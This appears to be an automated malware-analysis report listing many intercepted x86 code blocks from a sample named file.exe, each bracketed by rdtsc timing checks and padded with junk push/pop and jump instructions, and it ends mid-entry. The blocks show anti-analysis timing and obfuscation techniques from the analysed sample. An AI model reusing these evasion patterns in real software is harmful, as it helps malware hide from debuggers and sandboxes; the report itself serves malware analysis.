Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23CF9 second address: A23D1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F661D451436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007F661D451436h 0x00000020 jnl 00007F661D451436h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23D1F second address: A23D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F0F4C second address: 9F0F5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21BF2 second address: A21BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F661CE75E86h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21BFF second address: A21C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21C08 second address: A21C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E99h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21EBD second address: A21EEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F661D451443h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F661D451440h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21EEA second address: A21EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22147 second address: A2214B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2214B second address: A22162 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jp 00007F661CE75E88h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22300 second address: A22304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2248F second address: A224AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A224AE second address: A224D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jns 00007F661D451436h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F661D45143Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A224D1 second address: A224D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22CC9 second address: A22CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F661D45143Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F661D451438h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F661D451445h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A19F1F second address: A19F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jl 00007F661CE75E86h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A19F30 second address: A19F3D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22E5A second address: A22E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jmp 00007F661CE75E93h 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22E77 second address: A22E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Ah 0x00000009 pop esi 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F661D451436h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22E90 second address: A22EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F661CE75E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23608 second address: A23624 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F661D451444h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23624 second address: A23628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A237A2 second address: A237B2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F661D451436h 0x00000008 je 00007F661D451436h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A237B2 second address: A237B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23B8D second address: A23B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23B91 second address: A23BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F661CE75E86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23BA0 second address: A23BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F661D45143Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23BB2 second address: A23BB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23BB7 second address: A23BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F661D451436h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23BC5 second address: A23BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F661CE75E86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A262A1 second address: A262A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A262A7 second address: A262C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F661CE75E92h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A262C6 second address: A262CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A262CC second address: A26312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 jmp 00007F661CE75E99h 0x00000015 pop ecx 0x00000016 mov eax, dword ptr [eax] 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F661CE75E86h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A24BE6 second address: A24BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A253CF second address: A253D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2C3EE second address: A2C3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F592 second address: A2F5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E94h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F5AC second address: A2F5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F661D451443h 0x0000000b jmp 00007F661D45143Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F5C4 second address: A2F5CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F861 second address: A2F86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F661D451436h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F86F second address: A2F875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F875 second address: A2F8B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007F661D45144Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F661D451446h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2FDCD second address: A2FDEA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F661CE75E92h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2FF70 second address: A2FF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2FF74 second address: A2FF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jp 00007F661CE75E86h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 jmp 00007F661CE75E8Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32B33 second address: A32B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 add dword ptr [esp], 5AB4AA60h 0x0000000c jmp 00007F661D45143Dh 0x00000011 push C5E9A9CAh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32FD1 second address: A32FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A337AC second address: A337B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33A7A second address: A33A84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33A84 second address: A33A91 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33A91 second address: A33A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33A97 second address: A33A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33B68 second address: A33B72 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33DD8 second address: A33DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A342BD second address: A342F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F661CE75E93h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F661CE75E97h 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007F661CE75E86h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A342F7 second address: A342FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A354CD second address: A354D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A354D2 second address: A354E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A365B5 second address: A36611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F661CE75E94h 0x0000000c nop 0x0000000d movzx edi, cx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F661CE75E88h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D38A2h] 0x00000034 mov esi, dword ptr [ebp+122D380Ah] 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F661CE75E8Eh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A36611 second address: A36617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A36617 second address: A3661B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3702C second address: A37036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A37036 second address: A37074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F661CE75E86h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 nop 0x00000016 cld 0x00000017 push 00000000h 0x00000019 mov si, bx 0x0000001c push 00000000h 0x0000001e jmp 00007F661CE75E8Ch 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a pop eax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A36DDA second address: A36DFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D45143Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38608 second address: A3860D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3860D second address: A38617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F661D451436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38308 second address: A3830C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3830C second address: A38310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EDA47 second address: 9EDA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EDA4B second address: 9EDA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EDA4F second address: 9EDA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EDA57 second address: 9EDA61 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D45143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3CFC5 second address: A3CFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F661CE75E86h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3CFD0 second address: A3CFD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3CFD7 second address: A3D029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2337h], ebx 0x00000010 xor dword ptr [ebp+122D2DA2h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F661CE75E88h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 movsx ebx, cx 0x00000035 mov dword ptr [ebp+122D2390h], ebx 0x0000003b push 00000000h 0x0000003d mov ebx, dword ptr [ebp+122D232Bh] 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D029 second address: A3D034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F661D451436h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D034 second address: A3D063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F661CE75E86h 0x00000009 jmp 00007F661CE75E98h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007F661CE75E86h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D063 second address: A3D067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D067 second address: A3D06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3AB9A second address: A3AB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3E035 second address: A3E098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007F661CE75E88h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 cld 0x00000021 mov ebx, dword ptr [ebp+122D3806h] 0x00000027 push 00000000h 0x00000029 jmp 00007F661CE75E95h 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D3616h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F661CE75E96h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EF73 second address: A3EFFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F661D451438h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D362Eh] 0x0000002d push 00000000h 0x0000002f mov di, 391Ch 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F661D451438h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov ebx, dword ptr [ebp+122D2D02h] 0x00000055 push ecx 0x00000056 xor di, C515h 0x0000005b pop edi 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 jmp 00007F661D451444h 0x00000065 pushad 0x00000066 popad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3EFFF second address: A3F006 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A400F9 second address: A400FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A400FF second address: A40187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F661CE75E88h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 pushad 0x00000026 sub dword ptr [ebp+122D2C44h], esi 0x0000002c popad 0x0000002d jp 00007F661CE75E92h 0x00000033 jp 00007F661CE75E8Ch 0x00000039 mov ebx, dword ptr [ebp+12458290h] 0x0000003f push 00000000h 0x00000041 mov edi, dword ptr [ebp+122D2E66h] 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007F661CE75E88h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 0000001Ch 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 